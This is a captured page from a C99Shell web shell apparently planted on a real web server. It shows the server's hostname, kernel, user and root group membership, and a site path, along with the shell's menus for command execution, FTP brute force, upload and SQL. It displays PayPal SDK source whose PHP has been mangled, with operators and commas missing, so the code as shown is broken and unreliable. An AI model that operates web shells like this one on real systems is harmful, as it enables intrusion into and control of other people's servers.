!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smm.picotech.app/public_html/vendor/paypal/rest-api-sdk-php/lib/PayPal/Api/   drwxr-xr-x
Free 28.76 GB of 117.98 GB (24.38%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     OpenIdSession.php (3.69 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
namespace PayPal\Api;


use 
PayPal\Core\PayPalConstants;
use 
PayPal\Rest\ApiContext;

class 
OpenIdSession
{

    
/**
     * Returns the PayPal URL to which the user must be redirected to
     * start the authentication / authorization process.
     *
     * @param string $redirectUri Uri on merchant website to where
     *                                  the user must be redirected to post paypal login
     * @param array $scope The access privilges that you are requesting for
     *                                  from the user. Pass empty array for all scopes.
     * @param string $clientId client id from developer portal
     *                                  See https://developer.paypal.com/docs/integration/direct/log-in-with-paypal/detailed/#attributes for more
     * @param null $nonce
     * @param null $state
     * @param ApiContext $apiContext Optional API Context
     * @return string Authorization URL
     */
    
public static function getAuthorizationUrl($redirectUri$scope$clientId$nonce null$state null$apiContext null)
    {
        
$apiContext $apiContext $apiContext : new ApiContext();
        
$config $apiContext->getConfig();

        if (
$apiContext->get($clientId)) {
            
$clientId $apiContext->get($clientId);
        }

        
$clientId $clientId $clientId $apiContext->getCredential()->getClientId();

        
$scope count($scope) != $scope : array('openid''profile''address''email''phone',
            
'https://uri.paypal.com/services/paypalattributes''https://uri.paypal.com/services/expresscheckout');
        if (!
in_array('openid'$scope)) {
            
$scope[] = 'openid';
        }

        
$params = array(
            
'client_id' => $clientId,
            
'response_type' => 'code',
            
'scope' => implode(" "$scope),
            
'redirect_uri' => $redirectUri
        
);

        if (
$nonce) {
            
$params['nonce'] = $nonce;
        }
        if (
$state) {
            
$params['state'] = $state;
        }
        return 
sprintf("%s/signin/authorize?%s"self::getBaseUrl($config), http_build_query($params));
    }


    
/**
     * Returns the URL to which the user must be redirected to
     * logout from the OpenID provider (i.e. PayPal)
     *
     * @param string     $redirectUri   Uri on merchant website to where
     *                                  the user must be redirected to post logout
     * @param string     $idToken       id_token from the TokenInfo object
     * @param ApiContext $apiContext    Optional API Context
     * @return string logout URL
     */
    
public static function getLogoutUrl($redirectUri$idToken$apiContext null)
    {

        if (
is_null($apiContext)) {
            
$apiContext = new ApiContext();
        }
        
$config $apiContext->getConfig();

        
$params = array(
            
'id_token' => $idToken,
            
'redirect_uri' => $redirectUri,
            
'logout' => 'true'
        
);
        return 
sprintf("%s/webapps/auth/protocol/openidconnect/v1/endsession?%s"self::getBaseUrl($config), http_build_query($params));
    }

    
/**
     * Gets the base URL for the Redirect URI
     *
     * @param $config
     * @return null|string
     */
    
private static function getBaseUrl($config)
    {

        if (
array_key_exists('openid.RedirectUri'$config)) {
            return 
$config['openid.RedirectUri'];
        } else if (
array_key_exists('mode'$config)) {
            switch (
strtoupper($config['mode'])) {
                case 
'SANDBOX':
                    return 
PayPalConstants::OPENID_REDIRECT_SANDBOX_URL;
                case 
'LIVE':
                    return 
PayPalConstants::OPENID_REDIRECT_LIVE_URL;
            }
        }
        return 
null;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--